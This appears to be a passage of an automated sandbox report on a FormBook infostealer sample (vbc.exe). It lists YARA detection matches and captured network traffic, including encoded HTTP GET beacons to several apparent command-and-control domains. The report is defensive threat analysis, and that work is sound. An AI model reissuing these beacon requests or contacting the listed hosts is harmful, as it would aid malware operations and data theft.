          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Tue, 09 Nov 2021 11:58:02 GMTContent-Type: text/htmlContent-Length: 275ETag: "6182ac26-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Tue, 09 Nov 2021 11:58:13 GMTContent-Type: text/htmlContent-Length: 275ETag: "6185407c-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: vbc.exe, 00000000.00000002.264277671.0000000002AA1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 0000000B.00000000.291685186.0000000006870000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: unknownDNS traffic detected: queries for: www.sharpstead.com
          Source: global trafficHTTP traffic detected: GET /ht08/?iJB=mF30mN7A1kBKKp3mrHfcBE8aj8d3j5TIPkteVwKSLkWL0x2hCorpOf84nkcbs5VIH8t4m4OlHQ==&IfNL=N8ph5BwH HTTP/1.1Host: www.sharpstead.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ht08/?iJB=Nn3GQotxroHeSkioJYlyOg7hZYbVcqG0YP1z9npFKY7KnSOBRhEQe9R9FJ0MVZ+9dT/G4+QqxQ==&IfNL=N8ph5BwH HTTP/1.1Host: www.maikoufarm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ht08/?iJB=YVcVQnADBOxtkizi8PwpXZC8MGRy3pUK9Tt3i8wwHZUtpCp/3ZP4J1retOso95pi3Qz1GtS4tg==&IfNL=N8ph5BwH HTTP/1.1Host: www.septemberstockevent200.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ht08/?iJB=fVUe8feYpN4PFMr+KvtZZrG4xoghHK64bhP/N9fXdzCzpP/t7mUgEUqRnlKHZLETABk8BcDy+g==&IfNL=N8ph5BwH HTTP/1.1Host: www.joye.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ht08/?iJB=wOE3x7GIWdnAHRhnI1Z2es1853h2m7xTnUUyaHf9EMpp2ij5NZFAPBiYMZ80Da0iVaPeuYXsZg==&IfNL=N8ph5BwH HTTP/1.1Host: www.mmj0115.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ht08/?iJB=wOE3x7GIWdnAHRhnI1Z2es1853h2m7xTnUUyaHf9EMpp2ij5NZFAPBiYMZ80Da0iVaPeuYXsZg==&IfNL=N8ph5BwH HTTP/1.1Host: www.mmj0115.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ht08/?iJB=7p5yDMcVtDK+2VMLZex1Kw5DaL8n+amtJoDm972Jkr9Bm6oPOM+PHzWXusl+HrepqAW+ZRiK3Q==&IfNL=N8ph5BwH HTTP/1.1Host: www.miabellavita.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ht08/?iJB=h33IU5xP+CsHIX0jyOd12cEn3mj+DYpLQqBt2JgN37c56kNOSv5/h9LYm8RBo0LsRlylinxRVA==&IfNL=N8ph5BwH HTTP/1.1Host: www.yungbredda.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ht08/?iJB=tWyE4dKPScuS56voJaD4LHzf4KVLRr2HjGj+V9mFA/0BkTQ5rlgiVQpU1IInoYX1Wdu+PEboiA==&IfNL=N8ph5BwH HTTP/1.1Host: www.mattlambert.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: vbc.exe, 00000000.00000002.263973483.0000000000D39000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 8.0.vbc.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.vbc.exe.3bfcd00.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.vbc.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.vbc.exe.3bb72e0.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000002.343817848.00000000012F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.261930236.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.261342946.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.513280768.0000000002B40000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.264514879.0000000003AA9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.512917942.0000000002A40000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.511655958.0000000000270000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.343872613.0000000001320000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.296889219.000000000E75A000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.312766069.000000000E75A000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.342880104.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 8.0.vbc.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.0.vbc.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 8.0.vbc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.0.vbc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 8.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 8.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 8.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 8.0.vbc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.0.vbc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.vbc.exe.3bfcd00.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.vbc.exe.3bfcd00.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 8.0.vbc.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.0.vbc.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.vbc.exe.3bb72e0.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.vbc.exe.3bb72e0.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.343817848.00000000012F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.343817848.00000000012F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000000.261930236.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000000.261930236.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000000.261342946.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000000.261342946.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000014.00000002.513280768.0000000002B40000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000014.00000002.513280768.0000000002B40000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.264514879.0000000003AA9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.264514879.0000000003AA9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000014.00000002.512917942.0000000002A40000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000014.00000002.512917942.0000000002A40000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000014.00000002.511655958.0000000000270000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000014.00000002.511655958.0000000000270000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.343872613.0000000001320000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.343872613.0000000001320000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000000.296889219.000000000E75A000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000000.296889219.000000000E75A000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000000.312766069.000000000E75A000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000000.312766069.000000000E75A000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.342880104.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.342880104.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: vbc.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
          Source: 8.0.vbc.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.0.vbc.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.0.vbc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.0.vbc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.0.vbc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.0.vbc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.vbc.exe.3bfcd00.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.vbc.exe.3bfcd00.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.0.vbc.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.0.vbc.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.vbc.exe.3bb72e0.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.vbc.exe.3bb72e0.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.343817848.00000000012F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.343817848.00000000012F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000000.261930236.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000000.261930236.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000000.261342946.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000000.261342946.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000014.00000002.513280768.0000000002B40000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000014.00000002.513280768.0000000002B40000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.264514879.0000000003AA9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.264514879.0000000003AA9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000014.00000002.512917942.0000000002A40000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000014.00000002.512917942.0000000002A40000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000014.00000002.511655958.0000000000270000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000014.00000002.511655958.0000000000270000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.343872613.0000000001320000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.343872613.0000000001320000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000000.296889219.000000000E75A000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000000.296889219.000000000E75A000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000000.312766069.000000000E75A000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000000.312766069.000000000E75A000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.342880104.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.342880104.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\vbc.exeCode function: 0_2_0295E970
          Source: C:\Users\user\Desktop\vbc.exeCode function: 0_2_0295E96C
          Source: C:\Users\user\Desktop\vbc.exeCode function: 0_2_0295CF94
          Source: C:\Users\user\Desktop\vbc.exeCode function: 0_2_04FCDD66
